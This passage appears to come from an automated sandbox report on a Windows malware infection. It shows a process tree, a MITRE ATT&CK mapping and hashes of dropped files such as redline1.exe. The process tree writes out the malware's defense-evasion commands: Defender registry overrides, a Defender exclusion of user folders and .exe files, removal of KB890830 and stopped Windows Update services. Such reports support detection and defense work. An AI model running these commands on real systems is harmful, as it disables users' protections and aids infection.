                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\7zS6404.tmp\Install.exe it /iTpdidqJWo 385118 /S
                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                        PID:2984
                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                            PID:5328
                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                                                                                              forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                PID:1484
                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                  /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                    PID:3580
                                                                                                                                                                                                                                                                                    • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                        PID:1080
                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                                                                                                    forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                      PID:6000
                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                          PID:5308
                                                                                                                                                                                                                                                                                          • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                            reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                              PID:964
                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                                                                                                          forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                            PID:5612
                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                              /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                PID:3232
                                                                                                                                                                                                                                                                                                • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                    PID:5924
                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                                                                                                                forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                  PID:1180
                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                    /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                                      PID:6132
                                                                                                                                                                                                                                                                                                      • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                          PID:3620
                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                                                                                                                      forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                        PID:5708
                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                          /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                                            PID:5840
                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                              powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                                                              PID:2144
                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\gpupdate.exe
                                                                                                                                                                                                                                                                                                                "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                                                                                                                  PID:3176
                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                        C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                          PID:4284
                                                                                                                                                                                                                                                                                                        • C:\ProgramData\Google\Chrome\updater.exe
                                                                                                                                                                                                                                                                                                          C:\ProgramData\Google\Chrome\updater.exe
                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                            PID:5232
                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                              C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                                                              PID:3636
                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                PID:5924
                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\wusa.exe
                                                                                                                                                                                                                                                                                                                  wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                    PID:5584
                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\sc.exe
                                                                                                                                                                                                                                                                                                                  C:\Windows\system32\sc.exe stop UsoSvc
                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                  • Launches sc.exe
                                                                                                                                                                                                                                                                                                                  PID:2820
                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\sc.exe
                                                                                                                                                                                                                                                                                                                  C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                  • Launches sc.exe
                                                                                                                                                                                                                                                                                                                  PID:6076
                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\sc.exe
                                                                                                                                                                                                                                                                                                                  C:\Windows\system32\sc.exe stop wuauserv
                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                  • Launches sc.exe
                                                                                                                                                                                                                                                                                                                  PID:4328
                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\sc.exe
                                                                                                                                                                                                                                                                                                                  C:\Windows\system32\sc.exe stop bits
                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                  • Launches sc.exe
                                                                                                                                                                                                                                                                                                                  PID:5404
                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\sc.exe
                                                                                                                                                                                                                                                                                                                  C:\Windows\system32\sc.exe stop dosvc
                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                  • Launches sc.exe
                                                                                                                                                                                                                                                                                                                  PID:1456
                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\powercfg.exe
                                                                                                                                                                                                                                                                                                                  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                    PID:392
                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\powercfg.exe
                                                                                                                                                                                                                                                                                                                    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                      PID:2304
                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\powercfg.exe
                                                                                                                                                                                                                                                                                                                      C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                        PID:4164
                                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\powercfg.exe
                                                                                                                                                                                                                                                                                                                        C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                          PID:5916
                                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\conhost.exe
                                                                                                                                                                                                                                                                                                                          C:\Windows\system32\conhost.exe
                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                            PID:1960
                                                                                                                                                                                                                                                                                                                          • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                            explorer.exe
                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                              PID:4412
                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe
                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe
                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                              PID:6056

                                                                                                                                                                                                                                                                                                                            Network

                                                                                                                                                                                                                                                                                                                            MITRE ATT&CK Matrix ATT&CK v13

                                                                                                                                                                                                                                                                                                                            Execution

                                                                                                                                                                                                                                                                                                                            Command and Scripting Interpreter

                                                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                                                            T1059

                                                                                                                                                                                                                                                                                                                            PowerShell

                                                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                                                            T1059.001

                                                                                                                                                                                                                                                                                                                            System Services

                                                                                                                                                                                                                                                                                                                            2
                                                                                                                                                                                                                                                                                                                            T1569

                                                                                                                                                                                                                                                                                                                            Service Execution

                                                                                                                                                                                                                                                                                                                            2
                                                                                                                                                                                                                                                                                                                            T1569.002

                                                                                                                                                                                                                                                                                                                            Scheduled Task/Job

                                                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                                                            T1053

                                                                                                                                                                                                                                                                                                                            Persistence

                                                                                                                                                                                                                                                                                                                            Create or Modify System Process

                                                                                                                                                                                                                                                                                                                            3
                                                                                                                                                                                                                                                                                                                            T1543

                                                                                                                                                                                                                                                                                                                            Windows Service

                                                                                                                                                                                                                                                                                                                            3
                                                                                                                                                                                                                                                                                                                            T1543.003

                                                                                                                                                                                                                                                                                                                            Boot or Logon Autostart Execution

                                                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                                                            T1547

                                                                                                                                                                                                                                                                                                                            Registry Run Keys / Startup Folder

                                                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                                                            T1547.001

                                                                                                                                                                                                                                                                                                                            Pre-OS Boot

                                                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                                                            T1542

                                                                                                                                                                                                                                                                                                                            Bootkit

                                                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                                                            T1542.003

                                                                                                                                                                                                                                                                                                                            Scheduled Task/Job

                                                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                                                            T1053

                                                                                                                                                                                                                                                                                                                            Privilege Escalation

                                                                                                                                                                                                                                                                                                                            Create or Modify System Process

                                                                                                                                                                                                                                                                                                                            3
                                                                                                                                                                                                                                                                                                                            T1543

                                                                                                                                                                                                                                                                                                                            Windows Service

                                                                                                                                                                                                                                                                                                                            3
                                                                                                                                                                                                                                                                                                                            T1543.003

                                                                                                                                                                                                                                                                                                                            Abuse Elevation Control Mechanism

                                                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                                                            T1548

                                                                                                                                                                                                                                                                                                                            Bypass User Account Control

                                                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                                                            T1548.002

                                                                                                                                                                                                                                                                                                                            Boot or Logon Autostart Execution

                                                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                                                            T1547

                                                                                                                                                                                                                                                                                                                            Registry Run Keys / Startup Folder

                                                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                                                            T1547.001

                                                                                                                                                                                                                                                                                                                            Scheduled Task/Job

                                                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                                                            T1053

                                                                                                                                                                                                                                                                                                                            Defense Evasion

                                                                                                                                                                                                                                                                                                                            Modify Registry

                                                                                                                                                                                                                                                                                                                            6
                                                                                                                                                                                                                                                                                                                            T1112

                                                                                                                                                                                                                                                                                                                            Abuse Elevation Control Mechanism

                                                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                                                            T1548

                                                                                                                                                                                                                                                                                                                            Bypass User Account Control

                                                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                                                            T1548.002

                                                                                                                                                                                                                                                                                                                            Impair Defenses

                                                                                                                                                                                                                                                                                                                            4
                                                                                                                                                                                                                                                                                                                            T1562

                                                                                                                                                                                                                                                                                                                            Disable or Modify Tools

                                                                                                                                                                                                                                                                                                                            3
                                                                                                                                                                                                                                                                                                                            T1562.001

                                                                                                                                                                                                                                                                                                                            Virtualization/Sandbox Evasion

                                                                                                                                                                                                                                                                                                                            2
                                                                                                                                                                                                                                                                                                                            T1497

                                                                                                                                                                                                                                                                                                                            Pre-OS Boot

                                                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                                                            T1542

                                                                                                                                                                                                                                                                                                                            Bootkit

                                                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                                                            T1542.003

                                                                                                                                                                                                                                                                                                                            Subvert Trust Controls

                                                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                                                            T1553

                                                                                                                                                                                                                                                                                                                            Install Root Certificate

                                                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                                                            T1553.004

                                                                                                                                                                                                                                                                                                                            Credential Access

                                                                                                                                                                                                                                                                                                                            Unsecured Credentials

                                                                                                                                                                                                                                                                                                                            2
                                                                                                                                                                                                                                                                                                                            T1552

                                                                                                                                                                                                                                                                                                                            Credentials In Files

                                                                                                                                                                                                                                                                                                                            2
                                                                                                                                                                                                                                                                                                                            T1552.001

                                                                                                                                                                                                                                                                                                                            Discovery

                                                                                                                                                                                                                                                                                                                            Query Registry

                                                                                                                                                                                                                                                                                                                            6
                                                                                                                                                                                                                                                                                                                            T1012

                                                                                                                                                                                                                                                                                                                            Virtualization/Sandbox Evasion

                                                                                                                                                                                                                                                                                                                            2
                                                                                                                                                                                                                                                                                                                            T1497

                                                                                                                                                                                                                                                                                                                            System Information Discovery

                                                                                                                                                                                                                                                                                                                            5
                                                                                                                                                                                                                                                                                                                            T1082

                                                                                                                                                                                                                                                                                                                            Collection

                                                                                                                                                                                                                                                                                                                            Data from Local System

                                                                                                                                                                                                                                                                                                                            2
                                                                                                                                                                                                                                                                                                                            T1005

                                                                                                                                                                                                                                                                                                                            Command and Control

                                                                                                                                                                                                                                                                                                                            Web Service

                                                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                                                            T1102

                                                                                                                                                                                                                                                                                                                            Impact

                                                                                                                                                                                                                                                                                                                            Service Stop

                                                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                                                            T1489

                                                                                                                                                                                                                                                                                                                            Replay Monitor

                                                                                                                                                                                                                                                                                                                            Loading Replay Monitor...

                                                                                                                                                                                                                                                                                                                            Downloads

                                                                                                                                                                                                                                                                                                                            • C:\Program Files (x86)\GameSyncLink\GameService.exe
                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                              288KB

                                                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                                                              d9ec6f3a3b2ac7cd5eef07bd86e3efbc

                                                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                                                              e1908caab6f938404af85a7df0f80f877a4d9ee6

                                                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                                                              472232ca821b5c2ef562ab07f53638bc2cc82eae84cea13fbe674d6022b6481c

                                                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                                                              1b6b8702dca3cb90fe64c4e48f2477045900c5e71dd96b84f673478bab1089febfa186bfc55aebd721ca73db1669145280ebb4e1862d3b9dc21f712cd76a07c4

                                                                                                                                                                                                                                                                                                                            • C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe
                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                              2.5MB

                                                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                                                              e6943a08bb91fc3086394c7314be367d

                                                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                                                              451d2e171f906fa6c43f8b901cd41b0283d1fa40

                                                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                                                              aafdcfe5386452f4924cfcc23f2cf7eccf3f868947ad7291a77b2eca2af0c873

                                                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                                                              505d3c76988882602f06398e747c4e496ecad9df1b7959069b87c8111c4d9118484f4d6baef5f671466a184c8caec362d635da210fa0987ccb746cbeea218d2a

                                                                                                                                                                                                                                                                                                                            • C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe
                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                              13.2MB

                                                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                                                              72b396a9053dff4d804e07ee1597d5e3

                                                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                                                              5ec4fefa66771613433c17c11545c6161e1552d5

                                                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                                                              d0b206f0f47a9f8593b6434dc27dadde8480a902e878882fa8c73fc7fe01b11d

                                                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                                                              ad96c9ca2feae7af7fcf01a843d5aa6cbdde0520d68dedff44554a17639c6c66b2301d73daf272708cb76c22eae2d5c89db23af45105c4f0e35f4787f98e192b

                                                                                                                                                                                                                                                                                                                            • C:\Program Files (x86)\GameSyncLink\installc.bat
                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                              301B

                                                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                                                              998ab24316795f67c26aca0f1b38c8ce

                                                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                                                              a2a6dc94e08c086fe27f8c08cb8178e7a64f200d

                                                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                                                              a468b43795f1083fb37b12787c5ff29f8117c26ac35af470084e00c48280442e

                                                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                                                              7c9c2ade898a8defb6510ddd15730bec859d4474071eb6b8e8738ea6089764f81924ad2a6ebf0479d4fed7d61890edaa38f4bfbf70a4e6b30d33aa5bfc5b5c75

                                                                                                                                                                                                                                                                                                                            • C:\Program Files (x86)\GameSyncLink\installg.bat
                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                              284B

                                                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                                                              5dee3cbf941c5dbe36b54690b2a3c240

                                                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                                                              82b9f1ad3ca523f3794e052f7e67ecdcd1ae87e1

                                                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                                                              98370b86626b8fd7a7cac96693348045b081326c49e2421113f49a5ea3588edb

                                                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                                                              9ee431d485e2f09268a22b287b0960859d2f22db8c7e61309a042999c436b3de74f5d75837b739e01122a796ad65bc6468d009ec6ddf4962f4ff288155410556

                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\1000006002\710992801b.exe
                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                              2.1MB

                                                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                                                              6417b47690c8a500a48a89654afd399e

                                                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                                                              34b532c3ff18951b513bd29bae0f1517129f0221

                                                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                                                              f7eda014418f5653361d25a9d5ed082baee50c38be198247ff27fccf76d7acb8

                                                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                                                              e92c7d456f249131bf05fbd0341fe1965d58578517a9d5aa01d04201ef29fdc7d5c068a0a037ce72cda97f89aa07ffa944d32733cbae5407a48487dde08a243d

                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\[email protected]
                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                              654B

                                                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                                                              5cdfc4b9de66db60219b702987b6884f

                                                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                                                              3f664159cd6af48abc3f4c4a2d0ec16ff715b208

                                                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                                                              9a52a5e9dcfcc59699cab7a8777c114d2b9685e68b00502c0bfb28b42ef3321d

                                                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                                                              3c14da8a340736a697b4b2188b1b250b7328278a11e3483cc684247a2c10fc2b69435013e2704275dae319d992a048ff66a074065e91e9a2f65cfbd24a874d1d

                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\[email protected]\setup.ini
                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                              830B

                                                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                                                              a483da8b27289fc9cc49d6b17e61cbf6

                                                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                                                              2d4a5a704c2ff332df6436b7bcd16365f03c2a97

                                                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                                                              f7785d4e80691cb2bb59301fe8962e50862c44d8992a0e308f86689b7ee76911

                                                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                                                              e0d061a5ed7c7789d11331b192c0693e9a49398de371153d1d13a8b7a32ae7078ea103b03a535ebd0581f1d9d56bacf77b9e31f68ab1888663111e8d2afea0a9

                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\1000003001\alex.exe
                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                              2.7MB

                                                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                                                              31841361be1f3dc6c2ce7756b490bf0f

                                                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                                                              ff2506641a401ac999f5870769f50b7326f7e4eb

                                                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                                                              222393a4ab4b2ae83ca861faee6df02ac274b2f2ca0bed8db1783dd61f2f37ee

                                                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                                                              53d66fa19e8db360042dadc55caaa9a1ca30a9d825e23ed2a58f32834691eb2aaaa27a4471e3fc4d13e201accc43160436ed0e9939df1cc227a62a09a2ae0019

                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\1000004001\gold.exe
                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                              402KB

                                                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                                                              7f981db325bfed412599b12604bd00ab

                                                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                                                              9f8a8fd9df3af3a4111e429b639174229c0c10cd

                                                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                                                              043839a678bed1b10be00842eae413f5ecd1cad7a0eaa384dd80bc1dcd31e69b

                                                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                                                              a5be61416bc60669523e15213098a6d3bb5a2393612b57863fedfa1ff974bc110e0b7e8aadc97d0c9830a80798518616f9edfb65ae22334a362a743b6af3a82d

                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\1000005001\amers.exe
                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                              1.9MB

                                                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                                                              2e73b9e2765053f0161aa0ea34c6d1b2

                                                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                                                              49f4dc0d4fa2e66f281ca67a5c3dc37b76282521

                                                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                                                              fbafbd2d04ccf9b8db353974e764df0d0a3d0691406b70daf7435222271967db

                                                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                                                              79e382bc44eb7bf81ee3a93a6ebe71720bece8a5b79ac77736a147ce58d36c7c165a6c6e55c8131060ff2f95bea34d1330270e0bd444392890b2a236de06869a

                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\1000005001\redline1.exe
                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                              304KB

                                                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                                                              9faf597de46ed64912a01491fe550d33

                                                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                                                              49203277926355afd49393782ae4e01802ad48af

                                                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                                                              0854678d655668c8ebb949c990166e26a4c04aef4ecf0191a95693ca150a9715

                                                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                                                              ef8a7a8566eaf962c4e21d49d9c1583ed2cdc9c2751ce75133a9765d2fa6dc511fc6cc99ea871eb83d50bd08a31cb0b25c03f27b8e6f351861231910a6cf1a1e

                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe
                                                                                                                                                                                                                                                                                                                              Filesize

